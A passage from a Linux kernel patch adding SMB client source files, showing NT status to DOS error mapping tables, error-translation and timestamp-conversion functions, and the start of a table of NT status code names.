++	ERRHRD, ERRgeneral, NT_STATUS_MISSING_SYSTEMFILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNHANDLED_EXCEPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_APP_INIT_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_CREATE_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_PAGEFILE}, {
++	ERRDOS, 124, NT_STATUS_INVALID_LEVEL}, {
++	ERRDOS, 86, NT_STATUS_WRONG_PASSWORD_CORE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_FLOAT_CONTEXT}, {
++	ERRDOS, 109, NT_STATUS_PIPE_BROKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_CORRUPT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_IO_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_EVENT_PAIR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_VOLUME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERIAL_NO_DEVICE_INITED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALIAS_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_NOT_GRANTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SECRETS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SECRET_TOO_LONG}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FULLSCREEN_MODE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_CONTEXT_IDS}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_TYPE_NOT_GRANTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_REGISTRY_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FT_MISSING_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_SERVICE_ENTRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNMAPPABLE_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNDEFINED_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_VOLUME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_WRONG_CYLINDER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_UNKNOWN_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_BAD_REGISTERS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_RECALIBRATE_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_OPERATION_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_RESET_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SHARED_IRQ_BUSY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FT_ORPHANING}, {
++	ERRHRD, ERRgeneral, 0xc000016e}, {
++	ERRHRD, ERRgeneral, 0xc000016f}, {
++	ERRHRD, ERRgeneral, 0xc0000170}, {
++	ERRHRD, ERRgeneral, 0xc0000171}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PARTITION_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BLOCK_LENGTH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_PARTITIONED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_LOCK_MEDIA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_UNLOAD_MEDIA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EOM_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_MEDIA}, {
++	ERRHRD, ERRgeneral, 0xc0000179}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_KEY_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_LOG_SPACE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SIDS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_KEY_HAS_CHILDREN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CHILD_MUST_BE_VOLATILE}, {
++	ERRDOS, 87, NT_STATUS_DEVICE_CONFIGURATION_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_INTERNAL_ERROR}, {
++	ERRDOS, 22, NT_STATUS_INVALID_DEVICE_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IO_DEVICE_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_PROTOCOL_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BACKUP_CONTROLLER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOG_FILE_FULL}, {
++	ERRDOS, 19, NT_STATUS_TOO_LATE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_LSA_SECRET},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_NO_TRUST_SAM_ACCOUNT to
++	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE during the session setup } */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_SAM_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_DOMAIN_FAILURE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CORRUPT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_CANT_START}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUST_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MUTANT_LIMIT_EXCEEDED}, {
++	ERRDOS, ERRnetlogonNotStarted, NT_STATUS_NETLOGON_NOT_STARTED}, {
++	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_EXPIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_POSSIBLE_DEADLOCK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_CREDENTIAL_CONFLICT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REMOTE_SESSION_LIMIT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CHANGED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_DOMAIN_TRUST_INCONSISTENT to NT_STATUS_LOGON_FAILURE
++	 during the session setup }  */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_DOMAIN_TRUST_INCONSISTENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FS_DRIVER_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_USER_SESSION_KEY}, {
++	ERRDOS, 59, NT_STATUS_USER_SESSION_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_LANG_NOT_FOUND}, {
++	ERRDOS, ERRnoresource, NT_STATUS_INSUFF_SERVER_RESOURCES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BUFFER_SIZE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_COMPONENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_WILDCARD}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_ADDRESSES}, {
++	ERRDOS, 52, NT_STATUS_ADDRESS_ALREADY_EXISTS}, {
++	ERRDOS, 64, NT_STATUS_ADDRESS_CLOSED}, {
++	ERRDOS, 64, NT_STATUS_CONNECTION_DISCONNECTED}, {
++	ERRDOS, 64, NT_STATUS_CONNECTION_RESET}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_NODES}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_ABORTED}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_TIMED_OUT}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_RELEASE}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_MATCH}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_RESPONDED}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_ID}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_TYPE}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_SERVER_SESSION}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_CLIENT_SESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_LOAD_REGISTRY_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEBUG_ATTACH_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SYSTEM_PROCESS_TERMINATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_NOT_ACCEPTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_BROWSER_SERVERS_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_VDM_HARD_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_CANCEL_TIMEOUT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REPLY_MESSAGE_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_ALIGNMENT}, {
++	ERRDOS, 193, NT_STATUS_IMAGE_CHECKSUM_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOST_WRITEBEHIND_DATA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID}, {
++	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_MUST_CHANGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_TINY_STREAM}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RECOVERY_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW_READ}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FAIL_CHECK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DUPLICATE_OBJECTID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_OBJECTID_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONVERT_TO_LARGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RETRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FOUND_OUT_OF_SCOPE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALLOCATE_BUCKET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROPSET_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MARSHALL_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_VARIANT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_ACCOUNT_LOCKED_OUT}, {
++	ERRDOS, ERRbadfid, NT_STATUS_HANDLE_NOT_CLOSABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_REFUSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_GRACEFUL_DISCONNECT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_ALREADY_ASSOCIATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_NOT_ASSOCIATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_INVALID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ACTIVE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_HOST_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROTOCOL_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PORT_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REQUEST_ABORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ABORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_COMPRESSION_BUFFER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_USER_MAPPED_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_AUDIT_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIMER_RESOLUTION_NOT_SET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_COUNT_LIMIT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_TIME_RESTRICTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_WKSTA_RESTRICTION}, {
++	ERRDOS, 193, NT_STATUS_IMAGE_MP_UP_MISMATCH}, {
++	ERRHRD, ERRgeneral, 0xc000024a}, {
++	ERRHRD, ERRgeneral, 0xc000024b}, {
++	ERRHRD, ERRgeneral, 0xc000024c}, {
++	ERRHRD, ERRgeneral, 0xc000024d}, {
++	ERRHRD, ERRgeneral, 0xc000024e}, {
++	ERRHRD, ERRgeneral, 0xc000024f}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INSUFFICIENT_LOGON_INFO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_DLL_ENTRYPOINT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_SERVICE_ENTRYPOINT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LPC_REPLY_LOST}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT1}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT2}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_QUOTA_LIMIT}, {
++	ERRSRV, 3, NT_STATUS_PATH_NOT_COVERED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_CALLBACK_ACTIVE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LICENSE_QUOTA_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_SHORT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_RECENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_HISTORY_CONFLICT}, {
++	ERRHRD, ERRgeneral, 0xc000025d}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PLUGPLAY_NO_DEVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNSUPPORTED_COMPRESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_HW_PROFILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH}, {
++	ERRDOS, 182, NT_STATUS_DRIVER_ORDINAL_NOT_FOUND}, {
++	ERRDOS, 127, NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND}, {
++	ERRDOS, 288, NT_STATUS_RESOURCE_NOT_OWNED}, {
++	ERRDOS, ErrTooManyLinks, NT_STATUS_TOO_MANY_LINKS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_LIST_INCONSISTENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_IS_OFFLINE}, {
++	ERRDOS, 21, 0xc000026e}, {
++	ERRDOS, 161, 0xc0000281}, {
++	ERRDOS, ERRnoaccess, 0xc000028a}, {
++	ERRDOS, ERRnoaccess, 0xc000028b}, {
++	ERRHRD, ERRgeneral, 0xc000028c}, {
++	ERRDOS, ERRnoaccess, 0xc000028d}, {
++	ERRDOS, ERRnoaccess, 0xc000028e}, {
++	ERRDOS, ERRnoaccess, 0xc000028f}, {
++	ERRDOS, ERRnoaccess, 0xc0000290}, {
++	ERRDOS, ERRbadfunc, 0xc000029c}, {
++	ERRDOS, ERRsymlink, NT_STATUS_STOPPED_ON_SYMLINK}, {
++	ERRDOS, ERRinvlevel, 0x007c0001}, {
++	0, 0, 0 }
++};
++
++/*****************************************************************************
++ Print an error message from the status code
++ *****************************************************************************/
++static void
++cifs_print_status(__u32 status_code)
++{
++	int idx = 0;
++
++	while (nt_errs[idx].nt_errstr != NULL) {
++		if (((nt_errs[idx].nt_errcode) & 0xFFFFFF) ==
++		    (status_code & 0xFFFFFF)) {
++			pr_notice("Status code returned 0x%08x %s\n",
++				  status_code, nt_errs[idx].nt_errstr);
++		}
++		idx++;
++	}
++	return;
++}
++
++
++static void
++ntstatus_to_dos(__u32 ntstatus, __u8 *eclass, __u16 *ecode)
++{
++	int i;
++	if (ntstatus == 0) {
++		*eclass = 0;
++		*ecode = 0;
++		return;
++	}
++	for (i = 0; ntstatus_to_dos_map[i].ntstatus; i++) {
++		if (ntstatus == ntstatus_to_dos_map[i].ntstatus) {
++			*eclass = ntstatus_to_dos_map[i].dos_class;
++			*ecode = ntstatus_to_dos_map[i].dos_code;
++			return;
++		}
++	}
++	*eclass = ERRHRD;
++	*ecode = ERRgeneral;
++}
++
++int
++map_smb_to_linux_error(char *buf, bool logErr)
++{
++	struct smb_hdr *smb = (struct smb_hdr *)buf;
++	unsigned int i;
++	int rc = -EIO;	/* if transport error smb error may not be set */
++	__u8 smberrclass;
++	__u16 smberrcode;
++
++	/* BB if NT Status codes - map NT BB */
++
++	/* old style smb error codes */
++	if (smb->Status.CifsError == 0)
++		return 0;
++
++	if (smb->Flags2 & SMBFLG2_ERR_STATUS) {
++		/* translate the newer STATUS codes to old style SMB errors
++		 * and then to POSIX errors */
++		__u32 err = le32_to_cpu(smb->Status.CifsError);
++		if (logErr && (err != (NT_STATUS_MORE_PROCESSING_REQUIRED)))
++			cifs_print_status(err);
++		else if (cifsFYI & CIFS_RC)
++			cifs_print_status(err);
++		ntstatus_to_dos(err, &smberrclass, &smberrcode);
++	} else {
++		smberrclass = smb->Status.DosError.ErrorClass;
++		smberrcode = le16_to_cpu(smb->Status.DosError.Error);
++	}
++
++	/* old style errors */
++
++	/* DOS class smb error codes - map DOS */
++	if (smberrclass == ERRDOS) {
++		/* 1 byte field no need to byte reverse */
++		for (i = 0;
++		     i <
++		     sizeof(mapping_table_ERRDOS) /
++		     sizeof(struct smb_to_posix_error); i++) {
++			if (mapping_table_ERRDOS[i].smb_err == 0)
++				break;
++			else if (mapping_table_ERRDOS[i].smb_err ==
++								smberrcode) {
++				rc = mapping_table_ERRDOS[i].posix_code;
++				break;
++			}
++			/* else try next error mapping one to see if match */
++		}
++	} else if (smberrclass == ERRSRV) {
++		/* server class of error codes */
++		for (i = 0;
++		     i <
++		     sizeof(mapping_table_ERRSRV) /
++		     sizeof(struct smb_to_posix_error); i++) {
++			if (mapping_table_ERRSRV[i].smb_err == 0)
++				break;
++			else if (mapping_table_ERRSRV[i].smb_err ==
++								smberrcode) {
++				rc = mapping_table_ERRSRV[i].posix_code;
++				break;
++			}
++			/* else try next error mapping to see if match */
++		}
++	}
++	/* else ERRHRD class errors or junk  - return EIO */
++
++	cifs_dbg(FYI, "Mapping smb error code 0x%x to POSIX err %d\n",
++		 le32_to_cpu(smb->Status.CifsError), rc);
++
++	/* generic corrective action e.g. reconnect SMB session on
++	 * ERRbaduid could be added */
++
++	return rc;
++}
++
++int
++map_and_check_smb_error(struct mid_q_entry *mid, bool logErr)
++{
++	int rc;
++	struct smb_hdr *smb = (struct smb_hdr *)mid->resp_buf;
++
++	rc = map_smb_to_linux_error((char *)smb, logErr);
++	if (rc == -EACCES && !(smb->Flags2 & SMBFLG2_ERR_STATUS)) {
++		/* possible ERRBaduid */
++		__u8 class = smb->Status.DosError.ErrorClass;
++		__u16 code = le16_to_cpu(smb->Status.DosError.Error);
++
++		/* switch can be used to handle different errors */
++		if (class == ERRSRV && code == ERRbaduid) {
++			cifs_dbg(FYI, "Server returned 0x%x, reconnecting session...\n",
++				code);
++			cifs_signal_cifsd_for_reconnect(mid->server, false);
++		}
++	}
++
++	return rc;
++}
++
++
++/*
++ * calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message
++ */
++unsigned int
++smbCalcSize(void *buf)
++{
++	struct smb_hdr *ptr = buf;
++	return (sizeof(struct smb_hdr) + (2 * ptr->WordCount) +
++		2 /* size of the bcc field */ + get_bcc(ptr));
++}
++
++/* The following are taken from fs/ntfs/util.c */
++
++#define NTFS_TIME_OFFSET ((u64)(369*365 + 89) * 24 * 3600 * 10000000)
++
++/*
++ * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
++ * into Unix UTC (based 1970-01-01, in seconds).
++ */
++struct timespec64
++cifs_NTtimeToUnix(__le64 ntutc)
++{
++	struct timespec64 ts;
++	/* BB what about the timezone? BB */
++
++	/* Subtract the NTFS time offset, then convert to 1s intervals. */
++	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
++	u64 abs_t;
++
++	/*
++	 * Unfortunately can not use normal 64 bit division on 32 bit arch, but
++	 * the alternative, do_div, does not work with negative numbers so have
++	 * to special case them
++	 */
++	if (t < 0) {
++		abs_t = -t;
++		ts.tv_nsec = (time64_t)(do_div(abs_t, 10000000) * 100);
++		ts.tv_nsec = -ts.tv_nsec;
++		ts.tv_sec = -abs_t;
++	} else {
++		abs_t = t;
++		ts.tv_nsec = (time64_t)do_div(abs_t, 10000000) * 100;
++		ts.tv_sec = abs_t;
++	}
++
++	return ts;
++}
++
++/* Convert the Unix UTC into NT UTC. */
++u64
++cifs_UnixTimeToNT(struct timespec64 t)
++{
++	/* Convert to 100ns intervals and then add the NTFS time offset. */
++	return (u64) t.tv_sec * 10000000 + t.tv_nsec/100 + NTFS_TIME_OFFSET;
++}
++
++static const int total_days_of_prev_months[] = {
++	0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334
++};
++
++struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time, int offset)
++{
++	struct timespec64 ts;
++	time64_t sec, days;
++	int min, day, month, year;
++	u16 date = le16_to_cpu(le_date);
++	u16 time = le16_to_cpu(le_time);
++	SMB_TIME *st = (SMB_TIME *)&time;
++	SMB_DATE *sd = (SMB_DATE *)&date;
++
++	cifs_dbg(FYI, "date %d time %d\n", date, time);
++
++	sec = 2 * st->TwoSeconds;
++	min = st->Minutes;
++	if ((sec > 59) || (min > 59))
++		cifs_dbg(VFS, "Invalid time min %d sec %lld\n", min, sec);
++	sec += (min * 60);
++	sec += 60 * 60 * st->Hours;
++	if (st->Hours > 24)
++		cifs_dbg(VFS, "Invalid hours %d\n", st->Hours);
++	day = sd->Day;
++	month = sd->Month;
++	if (day < 1 || day > 31 || month < 1 || month > 12) {
++		cifs_dbg(VFS, "Invalid date, month %d day: %d\n", month, day);
++		day = clamp(day, 1, 31);
++		month = clamp(month, 1, 12);
++	}
++	month -= 1;
++	days = day + total_days_of_prev_months[month];
++	days += 3652; /* account for difference in days between 1980 and 1970 */
++	year = sd->Year;
++	days += year * 365;
++	days += (year/4); /* leap year */
++	/* generalized leap year calculation is more complex, ie no leap year
++	for years/100 except for years/400, but since the maximum number for DOS
++	 year is 2**7, the last year is 1980+127, which means we need only
++	 consider 2 special case years, ie the years 2000 and 2100, and only
++	 adjust for the lack of leap year for the year 2100, as 2000 was a
++	 leap year (divisable by 400) */
++	if (year >= 120)  /* the year 2100 */
++		days = days - 1;  /* do not count leap year for the year 2100 */
++
++	/* adjust for leap year where we are still before leap day */
++	if (year != 120)
++		days -= ((year & 0x03) == 0) && (month < 2 ? 1 : 0);
++	sec += 24 * 60 * 60 * days;
++
++	ts.tv_sec = sec + offset;
++
++	/* cifs_dbg(FYI, "sec after cnvrt dos to unix time %d\n",sec); */
++
++	ts.tv_nsec = 0;
++	return ts;
++}
+diff --git a/fs/smb/client/nterr.c b/fs/smb/client/nterr.c
+new file mode 100644
+index 0000000000000..358a766375b4a
+--- /dev/null
++++ b/fs/smb/client/nterr.c
+@@ -0,0 +1,674 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  Unix SMB/Netbios implementation.
++ *  Version 1.9.
++ *  RPC Pipe client / server routines
++ *  Copyright (C) Luke Kenneth Casson Leighton 1997-2001.
++ */
++
++/* NT error codes - see nterr.h */
++#include <linux/types.h>
++#include <linux/fs.h>
++#include "nterr.h"
++
++const struct nt_err_code_struct nt_errs[] = {
++	{"NT_STATUS_OK", NT_STATUS_OK},
++	{"NT_STATUS_UNSUCCESSFUL", NT_STATUS_UNSUCCESSFUL},
++	{"NT_STATUS_NOT_IMPLEMENTED", NT_STATUS_NOT_IMPLEMENTED},
++	{"NT_STATUS_INVALID_INFO_CLASS", NT_STATUS_INVALID_INFO_CLASS},
++	{"NT_STATUS_INFO_LENGTH_MISMATCH", NT_STATUS_INFO_LENGTH_MISMATCH},
++	{"NT_STATUS_ACCESS_VIOLATION", NT_STATUS_ACCESS_VIOLATION},
++	{"NT_STATUS_BUFFER_OVERFLOW", NT_STATUS_BUFFER_OVERFLOW},
++	{"NT_STATUS_IN_PAGE_ERROR", NT_STATUS_IN_PAGE_ERROR},
++	{"NT_STATUS_PAGEFILE_QUOTA", NT_STATUS_PAGEFILE_QUOTA},
++	{"NT_STATUS_INVALID_HANDLE", NT_STATUS_INVALID_HANDLE},
++	{"NT_STATUS_BAD_INITIAL_STACK", NT_STATUS_BAD_INITIAL_STACK},
++	{"NT_STATUS_BAD_INITIAL_PC", NT_STATUS_BAD_INITIAL_PC},
++	{"NT_STATUS_INVALID_CID", NT_STATUS_INVALID_CID},
++	{"NT_STATUS_TIMER_NOT_CANCELED", NT_STATUS_TIMER_NOT_CANCELED},
++	{"NT_STATUS_INVALID_PARAMETER", NT_STATUS_INVALID_PARAMETER},
++	{"NT_STATUS_NO_SUCH_DEVICE", NT_STATUS_NO_SUCH_DEVICE},
++	{"NT_STATUS_NO_SUCH_FILE", NT_STATUS_NO_SUCH_FILE},
++	{"NT_STATUS_INVALID_DEVICE_REQUEST",
++	 NT_STATUS_INVALID_DEVICE_REQUEST},
++	{"NT_STATUS_END_OF_FILE", NT_STATUS_END_OF_FILE},
++	{"NT_STATUS_WRONG_VOLUME", NT_STATUS_WRONG_VOLUME},
++	{"NT_STATUS_NO_MEDIA_IN_DEVICE", NT_STATUS_NO_MEDIA_IN_DEVICE},
++	{"NT_STATUS_UNRECOGNIZED_MEDIA", NT_STATUS_UNRECOGNIZED_MEDIA},
++	{"NT_STATUS_NONEXISTENT_SECTOR", NT_STATUS_NONEXISTENT_SECTOR},
++	{"NT_STATUS_MORE_PROCESSING_REQUIRED",
++	 NT_STATUS_MORE_PROCESSING_REQUIRED},
++	{"NT_STATUS_NO_MEMORY", NT_STATUS_NO_MEMORY},
++	{"NT_STATUS_CONFLICTING_ADDRESSES",
++	 NT_STATUS_CONFLICTING_ADDRESSES},
++	{"NT_STATUS_NOT_MAPPED_VIEW", NT_STATUS_NOT_MAPPED_VIEW},
++	{"NT_STATUS_UNABLE_TO_FREE_VM", NT_STATUS_UNABLE_TO_FREE_VM},
++	{"NT_STATUS_UNABLE_TO_DELETE_SECTION",
++	 NT_STATUS_UNABLE_TO_DELETE_SECTION},
++	{"NT_STATUS_INVALID_SYSTEM_SERVICE",
++	 NT_STATUS_INVALID_SYSTEM_SERVICE},
++	{"NT_STATUS_ILLEGAL_INSTRUCTION", NT_STATUS_ILLEGAL_INSTRUCTION},
++	{"NT_STATUS_INVALID_LOCK_SEQUENCE",
++	 NT_STATUS_INVALID_LOCK_SEQUENCE},
++	{"NT_STATUS_INVALID_VIEW_SIZE", NT_STATUS_INVALID_VIEW_SIZE},
++	{"NT_STATUS_INVALID_FILE_FOR_SECTION",
++	 NT_STATUS_INVALID_FILE_FOR_SECTION},
++	{"NT_STATUS_ALREADY_COMMITTED", NT_STATUS_ALREADY_COMMITTED},
++	{"NT_STATUS_ACCESS_DENIED", NT_STATUS_ACCESS_DENIED},
++	{"NT_STATUS_BUFFER_TOO_SMALL", NT_STATUS_BUFFER_TOO_SMALL},
++	{"NT_STATUS_OBJECT_TYPE_MISMATCH", NT_STATUS_OBJECT_TYPE_MISMATCH},
++	{"NT_STATUS_NONCONTINUABLE_EXCEPTION",
++	 NT_STATUS_NONCONTINUABLE_EXCEPTION},
++	{"NT_STATUS_INVALID_DISPOSITION", NT_STATUS_INVALID_DISPOSITION},
++	{"NT_STATUS_UNWIND", NT_STATUS_UNWIND},
